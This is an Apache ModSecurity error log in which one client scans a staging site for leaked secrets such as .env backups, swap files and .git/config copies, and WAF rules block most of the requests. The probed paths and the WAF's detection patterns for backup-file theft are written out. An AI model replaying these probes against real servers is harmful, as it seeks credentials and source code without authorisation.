[Tue May 26 15:30:44.429974 2026] [security2:error] [pid 715645:tid 715837] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKIwAAAD4"]
[Tue May 26 15:30:44.430073 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKQQAAAA8"]
[Tue May 26 15:30:44.430444 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKPwAAAFE"]
[Tue May 26 15:30:44.431061 2026] [security2:error] [pid 715645:tid 715895] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKQgAAeCM"]
[Tue May 26 15:30:44.432349 2026] [security2:error] [pid 715645:tid 715895] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKFAAAeBI"]
[Tue May 26 15:30:44.432587 2026] [security2:error] [pid 715645:tid 715895] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKRAAAeA4"]
[Tue May 26 15:30:44.479019 2026] [security2:error] [pid 715645:tid 715808] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKeQAAACE"]
[Tue May 26 15:30:44.479570 2026] [security2:error] [pid 715645:tid 715897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKeAAAAHo"]
[Tue May 26 15:30:44.483504 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKegAAAAs"]
[Tue May 26 15:30:44.567196 2026] [security2:error] [pid 715645:tid 715782] [client 35.215.82.179:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKfQAAAAc"]
[Tue May 26 15:30:44.567687 2026] [security2:error] [pid 715645:tid 715829] [client 35.215.82.179:53052] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/"] [unique_id "ahVvTHVGgMGh8k213RgKewAAADY"]
[Tue May 26 15:30:44.573536 2026] [security2:error] [pid 715645:tid 715686] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env.backup"] [unique_id "ahVvTHVGgMGh8k213RgKhgAAPCg"]
[Tue May 26 15:30:44.578354 2026] [security2:error] [pid 715645:tid 715702] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env.bak"] [unique_id "ahVvTHVGgMGh8k213RgKiAAAfTg"]
[Tue May 26 15:30:44.718429 2026] [security2:error] [pid 715645:tid 715732] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/.env.php"] [unique_id "ahVvTHVGgMGh8k213RgKqQAAfVY"]
[Tue May 26 15:30:44.719580 2026] [security2:error] [pid 715645:tid 715717] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env.old"] [unique_id "ahVvTHVGgMGh8k213RgKpwAAfUc"]
[Tue May 26 15:30:44.756715 2026] [security2:error] [pid 715645:tid 715796] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKcAAAABU"]
[Tue May 26 15:30:45.022757 2026] [security2:error] [pid 715645:tid 715793] [client 35.215.82.179:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKvAAAABI"]
[Tue May 26 15:30:45.023309 2026] [security2:error] [pid 715645:tid 715784] [client 35.215.82.179:42648] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "panda-eco.com"] [uri "/"] [unique_id "ahVvTHVGgMGh8k213RgKugAAAAk"]
[Tue May 26 15:30:45.286838 2026] [security2:error] [pid 715645:tid 715811] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKnQAAACQ"]
[Tue May 26 15:30:45.292229 2026] [security2:error] [pid 715645:tid 715865] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKmwAAAFo"]
[Tue May 26 15:30:45.295813 2026] [security2:error] [pid 715645:tid 715794] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKmQAAABM"]
[Tue May 26 15:30:45.298742 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKoAAAAHQ"]
[Tue May 26 15:30:45.305305 2026] [security2:error] [pid 715645:tid 715867] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKmgAAAFw"]
[Tue May 26 15:30:45.309343 2026] [security2:error] [pid 715645:tid 715846] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKogAAAEc"]
[Tue May 26 15:30:45.311477 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKnwAAADI"]
[Tue May 26 15:30:45.313135 2026] [security2:error] [pid 715645:tid 715884] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKoQAAAG0"]
[Tue May 26 15:30:45.323315 2026] [security2:error] [pid 715645:tid 715873] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKsgAAAGI"]
[Tue May 26 15:30:45.331953 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKtAAAAFk"]
[Tue May 26 15:30:45.333767 2026] [security2:error] [pid 715645:tid 715791] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKtQAAABA"]
[Tue May 26 15:30:45.338582 2026] [security2:error] [pid 715645:tid 715886] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKtgAAAG8"]
[Tue May 26 15:30:45.338638 2026] [security2:error] [pid 715645:tid 715896] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKxAAAAHk"]
[Tue May 26 15:30:45.340295 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKngAAAG4"]
[Tue May 26 15:30:45.340690 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKxQAAADA"]
[Tue May 26 15:30:45.347221 2026] [security2:error] [pid 715645:tid 715902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTHVGgMGh8k213RgKswAAAH8"]
[Tue May 26 15:30:45.402860 2026] [security2:error] [pid 715645:tid 715797] [client 35.215.82.179:42648] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "panda-eco.com"] [uri "/wp-content/uploads/2024/05/privacy-policy.pdf"] [unique_id "ahVvTXVGgMGh8k213RgKzwAAABY"]
[Tue May 26 15:30:45.455874 2026] [security2:error] [pid 715645:tid 715766] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env~"] [unique_id "ahVvTXVGgMGh8k213RgK0AAAFHg"]
[Tue May 26 15:30:45.498389 2026] [autoindex:error] [pid 715645:tid 715859] [client 195.178.110.199:0] AH01276: Cannot serve directory /home1/moesartc/public_html/unsobered.com/staging/.git/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:30:45.512285 2026] [security2:error] [pid 715645:tid 715901] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTXVGgMGh8k213RgK2gAAAH4"]
[Tue May 26 15:30:45.513800 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTXVGgMGh8k213RgK2wAAAGY"]
[Tue May 26 15:30:45.529872 2026] [security2:error] [pid 715645:tid 715777] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTXVGgMGh8k213RgK3gAAAAI"]
[Tue May 26 15:30:45.600663 2026] [security2:error] [pid 715645:tid 715723] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.git/config.bak"] [unique_id "ahVvTXVGgMGh8k213RgK8gAADk0"]
[Tue May 26 15:30:45.600743 2026] [security2:error] [pid 715645:tid 715736] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.git/config.old"] [unique_id "ahVvTXVGgMGh8k213RgK8wAADlo"]
[Tue May 26 15:30:45.602276 2026] [security2:error] [pid 715645:tid 715703] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.git/config~"] [unique_id "ahVvTXVGgMGh8k213RgK9AAAejk"]
[Tue May 26 15:30:45.727746 2026] [security2:error] [pid 715645:tid 715814] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTXVGgMGh8k213RgLDAAAACc"]
[Tue May 26 15:30:45.736966 2026] [security2:error] [pid 715645:tid 715886] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTXVGgMGh8k213RgLDwAAAG8"]
[Tue May 26 15:30:45.755801 2026] [security2:error] [pid 715645:tid 715869] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTXVGgMGh8k213RgLFQAAAF4"]
[Tue May 26 15:30:45.861355 2026] [security2:error] [pid 715645:tid 715712] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env.swp"] [unique_id "ahVvTXVGgMGh8k213RgLFwAAbUI"]
[Tue May 26 15:30:45.912240 2026] [security2:error] [pid 715645:tid 715893] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTXVGgMGh8k213RgLJgAAAHY"]
[Tue May 26 15:30:45.915639 2026] [security2:error] [pid 715645:tid 715809] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTXVGgMGh8k213RgLKAAAACI"]
[Tue May 26 15:30:45.920710 2026] [security2:error] [pid 715645:tid 715863] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTXVGgMGh8k213RgLKwAAAFg"]
[Tue May 26 15:30:46.241118 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTnVGgMGh8k213RgLPwAAACg"]
[Tue May 26 15:30:46.941901 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvTnVGgMGh8k213RgLWAAAADA"]
[Tue May 26 15:30:47.232842 2026] [security2:error] [pid 715645:tid 715807] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLfwAAACA"]
[Tue May 26 15:30:47.238122 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLhgAAAHQ"]
[Tue May 26 15:30:47.238367 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLhQAAAFc"]
[Tue May 26 15:30:47.239666 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLgAAAABo"]
[Tue May 26 15:30:47.243461 2026] [security2:error] [pid 715645:tid 715837] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLggAAAD4"]
[Tue May 26 15:30:47.243681 2026] [security2:error] [pid 715645:tid 715882] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLfgAAAGs"]
[Tue May 26 15:30:47.245254 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLgwAAAHs"]
[Tue May 26 15:30:47.250708 2026] [security2:error] [pid 715645:tid 715887] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLiAAAAHA"]
[Tue May 26 15:30:47.255688 2026] [security2:error] [pid 715645:tid 715819] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLhAAAACw"]
[Tue May 26 15:30:47.277611 2026] [security2:error] [pid 715645:tid 715841] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLjQAAAEI"]
[Tue May 26 15:30:47.283861 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLiQAAABU"]
[Tue May 26 15:30:47.285943 2026] [security2:error] [pid 715645:tid 715775] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLiwAAAAA"]
[Tue May 26 15:30:47.560894 2026] [security2:error] [pid 715645:tid 715793] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLYwAAABI"]
[Tue May 26 15:30:47.809715 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLnwAAAFE"]
[Tue May 26 15:30:47.952817 2026] [security2:error] [pid 715645:tid 715846] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLpwAAAEc"]
[Tue May 26 15:30:47.955655 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvT3VGgMGh8k213RgLqAAAAHQ"]
